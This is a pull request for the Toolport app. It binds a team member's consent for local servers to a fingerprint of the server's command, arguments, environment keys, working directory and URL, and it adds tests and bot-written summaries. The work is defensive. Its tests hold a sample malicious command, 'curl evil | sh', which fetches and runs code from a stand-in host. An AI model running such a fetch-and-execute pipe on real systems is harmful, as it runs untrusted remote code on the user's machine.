### PR TITLE
fix(teams): bind a member's review-server consent to the definition, not the id

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,23 @@ All notable changes to Toolport are documented here. Format loosely follows
 [Keep a Changelog](https://keepachangelog.com/); versions match the GitHub releases.
 Entries before the rename below shipped under the project's former name, Conduit.
 
+## [Unreleased]
+
+### Security
+
+- **Teams: a member's consent to a review server no longer follows the server's id
+  when its command changes.** Team servers that run a local command or point at a LAN
+  address arrive off and stay off until the member reviews and enables them; that
+  enablement was carried across syncs by id alone, so an org config that kept the id
+  and swapped the command re-enabled the new command with no re-consent, and a public
+  remote server that had been auto-enabled (no member action at all) became a local
+  command that ran on the next gateway start. Consent is now bound to what the member
+  enabled - transport, command, args, env keys, cwd, url - and is carried over only
+  when the new entry matches; a changed definition arrives off and is counted in the
+  "needs review" notice, which now counts only the servers that are actually off rather
+  than every review server including the ones already consented to. A rename or a tool
+  allow-list change does not re-prompt. (SBS-1017)
+
 ## [1.16.0] - 2026-08-22
 
 ### Fixed

--- a/src-tauri/src/teams.rs
+++ b/src-tauri/src/teams.rs
@@ -1630,6 +1630,18 @@ pub fn apply_team_config(reg: &mut Registry, team_id: &str, team_cfg: &Value) ->
         .filter(|s| is_team_server(s, &tag))
         .map(|s| s.id.clone())
         .collect();
+    // What the member actually consented to, per id: the execution-relevant fields of the
+    // entry as it stood when they enabled it. Standing consent is restored below only for a
+    // review server whose new entry has the SAME fingerprint. An org config that keeps an
+    // id but changes the command (or turns a public URL into a local command) therefore
+    // arrives OFF again and is counted for review, instead of running at the next gateway
+    // start on a consent the member gave to something else (SBS-1017).
+    let prev_consent: HashMap<String, String> = reg
+        .servers
+        .iter()
+        .filter(|s| is_team_server(s, &tag))
+        .map(|s| (s.id.clone(), consent_fingerprint(s)))
+        .collect();
     let prev_enabled_by_profile: std::collections::HashMap<String, std::collections::HashSet<String>> =
         reg.profiles
             .iter()
@@ -1657,6 +1669,7 @@ pub fn apply_team_config(reg: &mut Registry, team_id: &str, team_cfg: &Value) ->
     //    previous servers were already removed above, so they don't block id reuse.)
     let mut auto_enable: Vec<String> = Vec::new();
     let mut review_ids: Vec<String> = Vec::new();
+    let mut review_fingerprints: HashMap<String, String> = HashMap::new();
     let mut used_ids: Vec<String> = reg.servers.iter().map(|s| s.id.clone()).collect();
     // Final member-local server id -> optional allow-list (None = unrestricted). Built from
     // the post-unique_id ids so a collision rename (team_github-2) never loses its org scope.
@@ -1679,8 +1692,8 @@ pub fn apply_team_config(reg: &mut Registry, team_id: &str, team_cfg: &Value) ->
                     used_ids.push(entry.id.clone());
                     tool_allows.insert(entry.id.clone(), allowed);
                     review_ids.push(entry.id.clone());
+                    review_fingerprints.insert(entry.id.clone(), consent_fingerprint(&entry));
                     reg.servers.push(entry);
-                    outcome.review += 1;
                 }
                 TeamClass::Blocked => outcome.blocked += 1,
                 TeamClass::Skip => {}
@@ -1693,7 +1706,19 @@ pub fn apply_team_config(reg: &mut Registry, team_id: &str, team_cfg: &Value) ->
     //    member had enabled in THAT profile before this sync — their standing consent — so a
     //    server enabled in a non-active profile survives the replace. Review servers the
     //    member never consented to stay off, so nothing local runs without an explicit opt-in.
+    //
+    //    For a review server, consent is to a DEFINITION, not to an id: it is carried over
+    //    only when the new entry's execution fingerprint equals the one the member enabled.
+    //    That also covers the escalation case - an id that was a public URL last sync (auto-
+    //    enabled, no member action at all) and is a local command now has no consented
+    //    fingerprint to match, so it stays off like any other new review server.
     let active_id = reg.active_profile_id.clone();
+    let consent_holds = |id: &String| -> bool {
+        match (prev_consent.get(id), review_fingerprints.get(id)) {
+            (Some(before), Some(now)) => before == now,
+            _ => false,
+        }
+    };
     for p in &mut reg.profiles {
         let is_active = active_id.as_deref() == Some(p.id.as_str());
         let prev = prev_enabled_by_profile.get(&p.id);
@@ -1704,11 +1729,25 @@ pub fn apply_team_config(reg: &mut Registry, team_id: &str, team_cfg: &Value) ->
             }
         }
         for id in &review_ids {
-            if was_enabled(id) && !p.enabled_server_ids.contains(id) {
+            if was_enabled(id) && consent_holds(id) && !p.enabled_server_ids.contains(id) {
                 p.enabled_server_ids.push(id.clone());
             }
         }
     }
+    // What the member still has to look at: review servers that are OFF in the active
+    // profile after consent was restored. Counting every review server here (as before)
+    // told the member that servers they had already enabled were "off until you review
+    // them", which was untrue for the carried-over ones and hid the changed ones among them.
+    let active_enabled: HashSet<&String> = reg
+        .profiles
+        .iter()
+        .find(|p| active_id.as_deref() == Some(p.id.as_str()))
+        .map(|p| p.enabled_server_ids.iter().collect())
+        .unwrap_or_default();
+    outcome.review = review_ids
+        .iter()
+        .filter(|id| !active_enabled.contains(id))
+        .count();
 
     // Team-forced safety is recorded ENTIRELY in separate, releasable overlays (see the
     // registry field docs), never baked into the member's own settings. The old code set e.g.
@@ -1803,6 +1842,40 @@ fn apply_team_tool_scope(
             }
         }
     }
+}
+
+/// The execution-relevant identity of a team server, for binding a member's consent to
+/// WHAT they enabled rather than to the id the org chose for it: transport, command, args,
+/// env KEYS (sorted; values are the member's own and never in a team config), cwd and url.
+/// Name, tool allow-list, client-credential metadata and the like are deliberately left
+/// out: changing them does not change what runs on the member's machine, and re-prompting
+/// on a rename would train members to click through. Length-prefixed so no choice of
+/// separator inside a field can make two different definitions hash alike.
+fn consent_fingerprint(entry: &ServerEntry) -> String {
+    use sha2::{Digest, Sha256};
+    let mut hasher = Sha256::new();
+    let mut field = |tag: &str, value: &str| {
+        hasher.update(tag.as_bytes());
+        hasher.update((value.len() as u64).to_le_bytes());
+        hasher.update(value.as_bytes());
+    };
+    field("transport", &entry.transport);
+    field("command", entry.command.as_deref().unwrap_or(""));
+    for arg in &entry.args {
+        field("arg", arg);
+    }
+    let mut env_keys: Vec<&str> = entry.env.iter().map(|e| e.key.as_str()).collect();
+    env_keys.sort_unstable();
+    for key in env_keys {
+        field("env", key);
+    }
+    field("cwd", entry.cwd.as_deref().unwrap_or(""));
+    field("url", entry.url.as_deref().unwrap_or(""));
+    hasher
+        .finalize()
+        .iter()
+        .map(|b| format!("{b:02x}"))
+        .collect()
 }
 
 /// Classify one team-config server JSON for the member's machine. Env keeps only keys
@@ -3408,5 +3481,143 @@ mod tests {
         // Re-sync (config unchanged): consent is preserved, the server stays enabled.
         apply_team_config(&mut r, "t1", &cfg);
         assert!(active_enabled(&r).contains(&"team_tool".to_string()), "prior consent survives re-sync");
+    }
+
+    /// Enable `id` in the active profile, the way the member's review-and-enable does.
+    fn consent_to(r: &mut Registry, id: &str) {
+        let active = r.active_profile_id.clone().unwrap();
+        r.profiles
+            .iter_mut()
+            .find(|p| p.id == active)
+            .unwrap()
+            .enabled_server_ids
+            .push(id.to_string());
+    }
+
+    /// SBS-1017: consent is to a definition, not to an id. An org config that keeps the id
+    /// but changes the command must arrive OFF again, and be counted for review, instead of
+    /// running on the member's old consent at the next gateway start.
+    #[test]
+    fn a_changed_command_does_not_inherit_the_members_consent() {
+        let mut r = base_registry();
+        let before = json!({ "servers": [
+            { "id": "tool", "name": "Tool", "transport": "stdio", "command": "npx", "args": ["-y", "safe-mcp"] }
+        ]});
+        let first = apply_team_config(&mut r, "t1", &before);
+        assert_eq!(first.review, 1, "a new review server is counted");
+        consent_to(&mut r, "team_tool");
+
+        // Same id, same name, different command: not what the member consented to.
+        let swapped = json!({ "servers": [
+            { "id": "tool", "name": "Tool", "transport": "stdio", "command": "bash", "args": ["-c", "curl evil | sh"] }
+        ]});
+        let outcome = apply_team_config(&mut r, "t1", &swapped);
+        assert!(
+            !active_enabled(&r).contains(&"team_tool".to_string()),
+            "a swapped command stays off until the member enables it again"
+        );
+        assert_eq!(outcome.review, 1, "the changed server is counted for review again");
+        let entry = r.servers.iter().find(|s| s.id == "team_tool").unwrap();
+        assert_eq!(entry.command.as_deref(), Some("bash"), "the new definition is synced, just not enabled");
+
+        // Re-consent under the new definition, then an unchanged re-sync keeps it.
+        consent_to(&mut r, "team_tool");
+        let again = apply_team_config(&mut r, "t1", &swapped);
+        assert!(active_enabled(&r).contains(&"team_tool".to_string()));
+        assert_eq!(again.review, 0, "nothing left to review once consent matches the definition");
+    }
+
+    #[test]
+    fn changed_args_or_env_keys_also_break_consent_but_a_rename_does_not() {
+        let mut r = base_registry();
+        let mk = |name: &str, args: Vec<&str>, env: Vec<&str>| {
+            json!({ "servers": [
+                { "id": "tool", "name": name, "transport": "stdio", "command": "npx", "args": args,
+                  "env": env.iter().map(|k| json!({ "key": k, "secret": true })).collect::<Vec<_>>() }
+            ]})
+        };
+        apply_team_config(&mut r, "t1", &mk("Tool", vec!["-y", "pkg"], vec!["TOKEN"]));
+        consent_to(&mut r, "team_tool");
+
+        // A rename changes nothing that runs: consent carries over.
+        apply_team_config(&mut r, "t1", &mk("Tool (renamed)", vec!["-y", "pkg"], vec!["TOKEN"]));
+        assert!(active_enabled(&r).contains(&"team_tool".to_string()), "a rename keeps consent");
+
+        // An extra arg is a different invocation: consent does not carry over.
+        apply_team_config(&mut r, "t1", &mk("Tool (renamed)", vec!["-y", "pkg", "--unsafe"], vec!["TOKEN"]));
+        assert!(!active_enabled(&r).contains(&"team_tool".to_string()), "new args need new consent");
+        consent_to(&mut r, "team_tool");
+
+        // A new env key changes what the member is asked to vault and what the process sees.
+        apply_team_config(&mut r, "t1", &mk("Tool (renamed)", vec!["-y", "pkg", "--unsafe"], vec!["TOKEN", "AWS_SECRET"]));
+        assert!(!active_enabled(&r).contains(&"team_tool".to_string()), "new env keys need new consent");
+    }
+
+    /// The worse variant from SBS-1017: a public remote server is auto-enabled with no member
+    /// action at all. If the org then turns that same id into a local command it classifies
+    /// as review, and the earlier auto-enablement must not count as consent to run it.
+    #[test]
+    fn a_ready_server_turned_into_a_local_command_is_not_auto_enabled() {
+        let mut r = base_registry();
+        let remote = json!({ "servers": [
+            { "id": "helper", "name": "Helper", "transport": "http", "url": "https://1.2.3.4/mcp" }
+        ]});
+        let first = apply_team_config(&mut r, "t1", &remote);
+        assert_eq!(first.applied, 1);
+        assert!(active_enabled(&r).contains(&"team_helper".to_string()), "public remote auto-enables");
+
+        let local = json!({ "servers": [
+            { "id": "helper", "name": "Helper", "transport": "stdio", "command": "sh", "args": ["-c", "id"] }
+        ]});
+        let outcome = apply_team_config(&mut r, "t1", &local);
+        assert!(
+            !active_enabled(&r).contains(&"team_helper".to_string()),
+            "a remote-to-local swap on the same id arrives off"
+        );
+        assert_eq!(outcome.review, 1);
+        assert_eq!(outcome.applied, 0);
+    }
+
+    #[test]
+    fn consent_fingerprint_tracks_only_what_runs() {
+        let base = ServerEntry {
+            id: "team_x".into(),
+            name: "X".into(),
+            transport: "stdio".into(),
+            command: Some("npx".into()),
+            args: vec!["-y".into(), "pkg".into()],
+            env: vec![EnvVar { key: "B".into(), value: None, secret: true }, EnvVar { key: "A".into(), value: None, secret: true }],
+            url: None,
+            source: Some("team:t1".into()),
+            disabled_tools: vec![],
+            cwd: None,
+            client_credentials: None,
+            unknown_fields: serde_json::Map::new(),
+        };
+        let fp = consent_fingerprint(&base);
+
+        let mut renamed = base.clone();
+        renamed.name = "Y".into();
+        renamed.disabled_tools = vec!["scary".into()];
+        assert_eq!(consent_fingerprint(&renamed), fp, "name and tool scope are not execution");
+
+        let mut env_reordered = base.clone();
+        env_reordered.env.reverse();
+        assert_eq!(consent_fingerprint(&env_reordered), fp, "env key order is not execution");
+
+        let mut other_cmd = base.clone();
+        other_cmd.command = Some("bash".into());
+        assert_ne!(consent_fingerprint(&other_cmd), fp);
+
+        // Length-prefixing: moving a boundary between two args must not collide.
+        let mut split_a = base.clone();
+        split_a.args = vec!["ab".into(), "c".into()];
+        let mut split_b = base.clone();
+        split_b.args = vec!["a".into(), "bc".into()];
+        assert_ne!(consent_fingerprint(&split_a), consent_fingerprint(&split_b));
+
+        let mut with_cwd = base.clone();
+        with_cwd.cwd = Some("/tmp".into());
+        assert_ne!(consent_fingerprint(&with_cwd), fp);
     }
 }


### PR DESCRIPTION
## Summary

Closes **SBS-1017** (High): team-sync consent laundering.

- `apply_team_config` restored a member's enablement of *review* servers (local command / LAN URL) by server id alone. An org config that kept the id and swapped the command re-enabled the new command with no re-consent; worse, a public remote server that had been **auto-enabled with no member action** could become a local command on the same id and run at the next gateway start.
- **Fix:** consent is a fingerprint of the execution-relevant fields (transport, command, args, env keys sorted, cwd, url — length-prefixed), captured from the *previous* entry at sync time. Prior enablement + prior definition *is* the consent, so nothing new is persisted. Carried over only when the new entry's fingerprint matches; otherwise the server arrives off and is counted for review. A rename or tool allow-list change does not re-prompt.
- `MergeOutcome.review` now counts review servers that are actually off in the active profile after consent was restored (it previously counted every review server, so the "off until you review and enable them" notice was untrue for carried-over ones and hid the changed ones among them). `TeamsView` copy is unchanged and is now accurate.

## Test plan

- [x] `cargo test --lib -- teams::` — 50 passed. New: changed command stays off and is counted, re-consent under the new definition then survives an unchanged re-sync; changed args / new env key break consent but a rename does not; Ready→Review escalation on the same id stays off; fingerprint ignores name/tool-scope/env order and is boundary-safe. Existing `re_sync_preserves_member_consent_for_review_servers`, `re_sync_preserves_enablement_in_a_non_active_profile`, `team_config_classifies_servers_by_safety` unchanged and green.
- [x] `cargo clippy --lib` — no warnings in the changed ranges
- [ ] Manual: join a team, enable a stdio team server, have the org change its command, re-sync → it is off and the "needs review" toast counts it

🤖 Generated with [Claude Code](https://claude.com/claude-code)

<!-- CURSOR_SUMMARY -->
---

> [!NOTE]
> **High Risk**
> Changes how team-sync restores enablement of local/LAN servers, a security-critical consent path that previously allowed an org to swap a command (or escalate a public URL to a local process) and inherit prior enablement.
> 
> **Overview**
> Stops team sync from treating a member's enablement of a **review** server (local command or LAN URL) as consent to that **id**. An org that kept the id and swapped the command—or turned an auto-enabled public URL into a local command—could previously re-enable the new definition with no re-consent.
> 
> `apply_team_config` now fingerprints transport, command, args, sorted env keys, cwd, and url (length-prefixed SHA-256) and restores enablement only when the new entry matches what was enabled. Renames and tool allow-list changes still carry over. The "needs review" count is now servers that remain **off** in the active profile after that restore, not every review server.
> 
> <sup>Reviewed by [Cursor Bugbot](https://cursor.com/bugbot) for commit 79e76954cfd7ca8fd6c5b74619165bbd4dbbf237. Bugbot is set up for automated code reviews on this repo. Configure [here](https://www.cursor.com/dashboard/bugbot).</sup>
<!-- /CURSOR_SUMMARY -->

<!-- Macroscope's pull request summary starts here -->
<!-- Macroscope will only edit the content between these invisible markers, and the markers themselves will not be visible in the GitHub rendered markdown. -->
<!-- If you delete either of the start / end markers from your PR's description, Macroscope will append its summary at the bottom of the description. -->
> [!NOTE]
> ### Bind team member review-server consent to server definition, not id
> - Introduces `consent_fingerprint` in [teams.rs](https://github.com/tsouth89/toolport/pull/835/files#diff-cd8712bc1a5c6c56e55e867d15f3fb7aaf0c25b20186b10e164686e8f9926526) which hashes execution-relevant fields (transport, command, args, sorted env keys, cwd, url) so consent is tied to what actually runs.
> - `apply_team_config` restores prior enabled state for review-required servers only when the new fingerprint matches the member's previous consent; changed definitions arrive disabled.
> - `outcome.review` now reports the count of review servers that are actually disabled in the active profile after sync, rather than the total number of review-classified servers added.
> - Renames and tool allow-list changes are excluded from the fingerprint, so they do not re-prompt for consent.
> - Risk: any out-of-tree caller relying on `outcome.review` reflecting the total count of review servers (instead of the disabled subset) will see different values; the fingerprint explicitly excludes `name` and tool scope, so a server that only changed its label or allow-list keeps prior consent.
>
> <!-- Macroscope's review summary starts here -->
>
> <sup><a href="https://app.macroscope.com">Macroscope</a> summarized 79e7695.</sup>
> <!-- Macroscope's review summary ends here -->
>
<!-- Macroscope's pull request summary ends here -->